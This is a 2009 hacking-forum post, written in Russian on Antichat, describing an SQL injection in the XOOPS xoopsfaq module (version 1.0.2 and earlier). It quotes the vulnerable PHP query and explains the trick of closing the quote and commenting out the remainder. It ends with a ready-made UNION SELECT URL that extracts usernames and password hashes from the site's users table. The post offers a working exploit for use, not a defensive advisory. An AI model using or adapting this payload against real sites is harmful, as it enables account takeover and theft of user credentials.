07.02.2009, 17:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
module xoopsfaq <== 1.0.2
Кусок кода.
PHP код:
if ($op == "listcontents") {
xoops_cp_header();
$sql = "SELECT category_title FROM ".$db->prefix("xoopsfaq_categories")." WHERE category_id='".$cat_id."'";
$result = $db->query($sql);
Чуть выше есть еще один запрос. То есть с переменной $cat_id работают два запроса, но для вывода данных я буду использовать запрос который я привел выше(в коде).
система стандартная, дописываем кавычку, чтоб не нарушить запрос, внедряем свой код, а лишнюю кавычку комментируем.
Пример:
Код:
http://localhost/site/modules/xoopsfaq/admin/index.php?op=listcontents&&cat_id=-1'+union+select+11111,concat(uname,0x3a,pass),3,4,5+from+ex_users/*
Последний раз редактировалось The matrix; 11.02.2009 в 19:24..
|
|
|